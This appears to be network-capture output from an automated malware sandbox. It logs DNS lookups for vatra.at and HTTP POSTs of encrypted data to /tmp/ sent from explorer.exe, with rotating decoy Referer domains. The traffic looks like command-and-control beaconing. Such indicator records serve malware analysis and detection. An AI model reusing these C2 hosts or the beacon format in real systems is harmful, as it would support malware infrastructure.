                                                          Jan 3, 2023 09:46:28.340996981 CET8.8.8.8192.168.2.50x6fe6No error (0)vatra.at190.140.74.43A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:28.340996981 CET8.8.8.8192.168.2.50x6fe6No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:28.340996981 CET8.8.8.8192.168.2.50x6fe6No error (0)vatra.at190.147.188.50A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:28.340996981 CET8.8.8.8192.168.2.50x6fe6No error (0)vatra.at211.171.233.126A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:28.340996981 CET8.8.8.8192.168.2.50x6fe6No error (0)vatra.at187.212.192.17A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:28.340996981 CET8.8.8.8192.168.2.50x6fe6No error (0)vatra.at178.31.8.68A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:30.093204021 CET8.8.8.8192.168.2.50xb88dNo error (0)vatra.at58.235.189.192A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:30.093204021 CET8.8.8.8192.168.2.50xb88dNo error (0)vatra.at93.112.238.85A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:30.093204021 CET8.8.8.8192.168.2.50xb88dNo error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:30.093204021 CET8.8.8.8192.168.2.50xb88dNo error (0)vatra.at190.140.74.43A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:30.093204021 CET8.8.8.8192.168.2.50xb88dNo error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:30.093204021 CET8.8.8.8192.168.2.50xb88dNo error (0)vatra.at190.147.188.50A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:30.093204021 CET8.8.8.8192.168.2.50xb88dNo error (0)vatra.at211.171.233.126A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:30.093204021 CET8.8.8.8192.168.2.50xb88dNo error (0)vatra.at187.212.192.17A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:30.093204021 CET8.8.8.8192.168.2.50xb88dNo error (0)vatra.at178.31.8.68A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:30.093204021 CET8.8.8.8192.168.2.50xb88dNo error (0)vatra.at175.120.254.9A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:52.910130978 CET8.8.8.8192.168.2.50x6810No error (0)vatra.at211.171.233.126A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:52.910130978 CET8.8.8.8192.168.2.50x6810No error (0)vatra.at187.212.192.17A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:52.910130978 CET8.8.8.8192.168.2.50x6810No error (0)vatra.at178.31.8.68A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:52.910130978 CET8.8.8.8192.168.2.50x6810No error (0)vatra.at175.120.254.9A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:52.910130978 CET8.8.8.8192.168.2.50x6810No error (0)vatra.at58.235.189.192A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:52.910130978 CET8.8.8.8192.168.2.50x6810No error (0)vatra.at93.112.238.85A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:52.910130978 CET8.8.8.8192.168.2.50x6810No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:52.910130978 CET8.8.8.8192.168.2.50x6810No error (0)vatra.at190.140.74.43A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:52.910130978 CET8.8.8.8192.168.2.50x6810No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:52.910130978 CET8.8.8.8192.168.2.50x6810No error (0)vatra.at190.147.188.50A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:54.537024021 CET8.8.8.8192.168.2.50x281eNo error (0)degroeneuitzender.nl5.135.247.111A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:55.776840925 CET8.8.8.8192.168.2.50xe866No error (0)vatra.at93.112.238.85A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:55.776840925 CET8.8.8.8192.168.2.50xe866No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:55.776840925 CET8.8.8.8192.168.2.50xe866No error (0)vatra.at190.140.74.43A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:55.776840925 CET8.8.8.8192.168.2.50xe866No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:55.776840925 CET8.8.8.8192.168.2.50xe866No error (0)vatra.at190.147.188.50A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:55.776840925 CET8.8.8.8192.168.2.50xe866No error (0)vatra.at211.171.233.126A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:55.776840925 CET8.8.8.8192.168.2.50xe866No error (0)vatra.at187.212.192.17A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:55.776840925 CET8.8.8.8192.168.2.50xe866No error (0)vatra.at178.31.8.68A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:55.776840925 CET8.8.8.8192.168.2.50xe866No error (0)vatra.at175.120.254.9A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:55.776840925 CET8.8.8.8192.168.2.50xe866No error (0)vatra.at58.235.189.192A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:56.346973896 CET8.8.8.8192.168.2.50xe62cNo error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:56.346973896 CET8.8.8.8192.168.2.50xe62cNo error (0)vatra.at190.140.74.43A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:56.346973896 CET8.8.8.8192.168.2.50xe62cNo error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:56.346973896 CET8.8.8.8192.168.2.50xe62cNo error (0)vatra.at190.147.188.50A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:56.346973896 CET8.8.8.8192.168.2.50xe62cNo error (0)vatra.at211.171.233.126A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:56.346973896 CET8.8.8.8192.168.2.50xe62cNo error (0)vatra.at187.212.192.17A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:56.346973896 CET8.8.8.8192.168.2.50xe62cNo error (0)vatra.at178.31.8.68A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:56.346973896 CET8.8.8.8192.168.2.50xe62cNo error (0)vatra.at175.120.254.9A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:56.346973896 CET8.8.8.8192.168.2.50xe62cNo error (0)vatra.at58.235.189.192A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:56.346973896 CET8.8.8.8192.168.2.50xe62cNo error (0)vatra.at93.112.238.85A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:57.067291975 CET8.8.8.8192.168.2.50x82bdNo error (0)vatra.at58.235.189.192A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:57.067291975 CET8.8.8.8192.168.2.50x82bdNo error (0)vatra.at93.112.238.85A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:57.067291975 CET8.8.8.8192.168.2.50x82bdNo error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:57.067291975 CET8.8.8.8192.168.2.50x82bdNo error (0)vatra.at190.140.74.43A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:57.067291975 CET8.8.8.8192.168.2.50x82bdNo error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:57.067291975 CET8.8.8.8192.168.2.50x82bdNo error (0)vatra.at190.147.188.50A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:57.067291975 CET8.8.8.8192.168.2.50x82bdNo error (0)vatra.at211.171.233.126A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:57.067291975 CET8.8.8.8192.168.2.50x82bdNo error (0)vatra.at187.212.192.17A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:57.067291975 CET8.8.8.8192.168.2.50x82bdNo error (0)vatra.at178.31.8.68A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:57.067291975 CET8.8.8.8192.168.2.50x82bdNo error (0)vatra.at175.120.254.9A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:58.623935938 CET8.8.8.8192.168.2.50xc830No error (0)vatra.at175.120.254.9A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:58.623935938 CET8.8.8.8192.168.2.50xc830No error (0)vatra.at58.235.189.192A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:58.623935938 CET8.8.8.8192.168.2.50xc830No error (0)vatra.at93.112.238.85A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:58.623935938 CET8.8.8.8192.168.2.50xc830No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:58.623935938 CET8.8.8.8192.168.2.50xc830No error (0)vatra.at190.140.74.43A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:58.623935938 CET8.8.8.8192.168.2.50xc830No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:58.623935938 CET8.8.8.8192.168.2.50xc830No error (0)vatra.at190.147.188.50A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:58.623935938 CET8.8.8.8192.168.2.50xc830No error (0)vatra.at211.171.233.126A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:58.623935938 CET8.8.8.8192.168.2.50xc830No error (0)vatra.at187.212.192.17A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:46:58.623935938 CET8.8.8.8192.168.2.50xc830No error (0)vatra.at178.31.8.68A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:00.088844061 CET8.8.8.8192.168.2.50x2229No error (0)vatra.at211.171.233.126A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:00.088844061 CET8.8.8.8192.168.2.50x2229No error (0)vatra.at187.212.192.17A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:00.088844061 CET8.8.8.8192.168.2.50x2229No error (0)vatra.at178.31.8.68A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:00.088844061 CET8.8.8.8192.168.2.50x2229No error (0)vatra.at175.120.254.9A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:00.088844061 CET8.8.8.8192.168.2.50x2229No error (0)vatra.at58.235.189.192A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:00.088844061 CET8.8.8.8192.168.2.50x2229No error (0)vatra.at93.112.238.85A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:00.088844061 CET8.8.8.8192.168.2.50x2229No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:00.088844061 CET8.8.8.8192.168.2.50x2229No error (0)vatra.at190.140.74.43A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:00.088844061 CET8.8.8.8192.168.2.50x2229No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:00.088844061 CET8.8.8.8192.168.2.50x2229No error (0)vatra.at190.147.188.50A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:02.193207979 CET8.8.8.8192.168.2.50xf2d3No error (0)vatra.at190.140.74.43A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:02.193207979 CET8.8.8.8192.168.2.50xf2d3No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:02.193207979 CET8.8.8.8192.168.2.50xf2d3No error (0)vatra.at190.147.188.50A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:02.193207979 CET8.8.8.8192.168.2.50xf2d3No error (0)vatra.at211.171.233.126A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:02.193207979 CET8.8.8.8192.168.2.50xf2d3No error (0)vatra.at187.212.192.17A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:02.193207979 CET8.8.8.8192.168.2.50xf2d3No error (0)vatra.at178.31.8.68A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:02.193207979 CET8.8.8.8192.168.2.50xf2d3No error (0)vatra.at175.120.254.9A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:02.193207979 CET8.8.8.8192.168.2.50xf2d3No error (0)vatra.at58.235.189.192A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:02.193207979 CET8.8.8.8192.168.2.50xf2d3No error (0)vatra.at93.112.238.85A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:02.193207979 CET8.8.8.8192.168.2.50xf2d3No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:03.332684994 CET8.8.8.8192.168.2.50x11d3No error (0)vatra.at190.140.74.43A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:03.332684994 CET8.8.8.8192.168.2.50x11d3No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:03.332684994 CET8.8.8.8192.168.2.50x11d3No error (0)vatra.at190.147.188.50A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:03.332684994 CET8.8.8.8192.168.2.50x11d3No error (0)vatra.at211.171.233.126A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:03.332684994 CET8.8.8.8192.168.2.50x11d3No error (0)vatra.at187.212.192.17A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:03.332684994 CET8.8.8.8192.168.2.50x11d3No error (0)vatra.at178.31.8.68A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:03.332684994 CET8.8.8.8192.168.2.50x11d3No error (0)vatra.at175.120.254.9A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:03.332684994 CET8.8.8.8192.168.2.50x11d3No error (0)vatra.at58.235.189.192A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:03.332684994 CET8.8.8.8192.168.2.50x11d3No error (0)vatra.at93.112.238.85A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:03.332684994 CET8.8.8.8192.168.2.50x11d3No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:04.931497097 CET8.8.8.8192.168.2.50x5924No error (0)vatra.at211.171.233.126A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:04.931497097 CET8.8.8.8192.168.2.50x5924No error (0)vatra.at187.212.192.17A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:04.931497097 CET8.8.8.8192.168.2.50x5924No error (0)vatra.at178.31.8.68A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:04.931497097 CET8.8.8.8192.168.2.50x5924No error (0)vatra.at175.120.254.9A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:04.931497097 CET8.8.8.8192.168.2.50x5924No error (0)vatra.at58.235.189.192A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:04.931497097 CET8.8.8.8192.168.2.50x5924No error (0)vatra.at93.112.238.85A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:04.931497097 CET8.8.8.8192.168.2.50x5924No error (0)vatra.at195.158.3.162A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:04.931497097 CET8.8.8.8192.168.2.50x5924No error (0)vatra.at190.140.74.43A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:04.931497097 CET8.8.8.8192.168.2.50x5924No error (0)vatra.at175.126.109.15A (IP address)IN (0x0001)false
                                                          Jan 3, 2023 09:47:04.931497097 CET8.8.8.8192.168.2.50x5924No error (0)vatra.at190.147.188.50A (IP address)IN (0x0001)false
                                                          • degroeneuitzender.nl
                                                          • vtnltmuyju.net
                                                            • vatra.at
                                                          • owtqjcmscg.com
                                                          • yclbkevn.com
                                                          • bvgxojnl.net
                                                          • eaybestph.net
                                                          • ywmrapro.org
                                                          • bmjduhjgq.net
                                                          • bagetn.org
                                                          • bdiba.net
                                                          • eaamgxfkry.net
                                                          • bcdjbmpl.net
                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.5497145.135.247.111443C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.549708195.158.3.16280C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 3, 2023 09:46:27.109616041 CET138OUTPOST /tmp/ HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://vtnltmuyju.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 142
                                                          Host: vatra.at
                                                          Jan 3, 2023 09:46:27.109632015 CET138OUTData Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 71 3a af a6
                                                          Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA .[k,vuq:BBnS6cT)6![bSC'?s;V
                                                          Jan 3, 2023 09:46:27.672688007 CET139INHTTP/1.0 404 Not Found
                                                          Date: Tue, 03 Jan 2023 08:46:27 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                          X-Powered-By: PHP/5.6.40
                                                          Content-Length: 8
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 04 00 00 00 72 e8 85 ea
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          10192.168.2.549721190.140.74.4380C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 3, 2023 09:47:02.399616003 CET835OUTPOST /tmp/ HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://eaamgxfkry.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 316
                                                          Host: vatra.at
                                                          Jan 3, 2023 09:47:02.402019024 CET835OUTData Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 61 30 d8 f4
                                                          Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA -[k,vua0^^qRw%~zpU((%[@kTS#!&=}=;@TtxG69_BG:lWOw*li#4[m
                                                          Jan 3, 2023 09:47:03.289249897 CET836INHTTP/1.0 404 Not Found
                                                          Date: Tue, 03 Jan 2023 08:47:02 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                          X-Powered-By: PHP/5.6.40
                                                          Content-Length: 331
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          11192.168.2.549722190.140.74.4380C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 3, 2023 09:47:03.538563967 CET837OUTPOST /tmp/ HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://bcdjbmpl.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 222
                                                          Host: vatra.at
                                                          Jan 3, 2023 09:47:03.538582087 CET837OUTData Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 26 0e fc 91
                                                          Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA -[k,vu&<r}B\m0N\4Ad[2&<E]KX#`4f_=*NM#mrV0!69&Ve5
                                                          Jan 3, 2023 09:47:04.442612886 CET838INHTTP/1.0 404 Not Found
                                                          Date: Tue, 03 Jan 2023 08:47:03 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                          X-Powered-By: PHP/5.6.40
                                                          Content-Length: 331
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.549709175.120.254.980C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 3, 2023 09:46:28.845990896 CET140OUTPOST /tmp/ HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://owtqjcmscg.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 118
                                                          Host: vatra.at
                                                          Jan 3, 2023 09:46:28.848963976 CET140OUTData Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 42 0c d9 fd
                                                          Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA -[k,vuBYKFSlQ2O\[
                                                          Jan 3, 2023 09:46:30.059654951 CET141INHTTP/1.0 404 Not Found
                                                          Date: Tue, 03 Jan 2023 08:46:29 GMT
                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                          X-Powered-By: PHP/5.6.40
                                                          Content-Length: 331
                                                          Connection: close
                                                          Content-Type: text/html; charset=utf-8
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.54971058.235.189.19280C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Jan 3, 2023 09:46:30.477191925 CET142OUTPOST /tmp/ HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://yclbkevn.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 231
                                                          Host: vatra.at
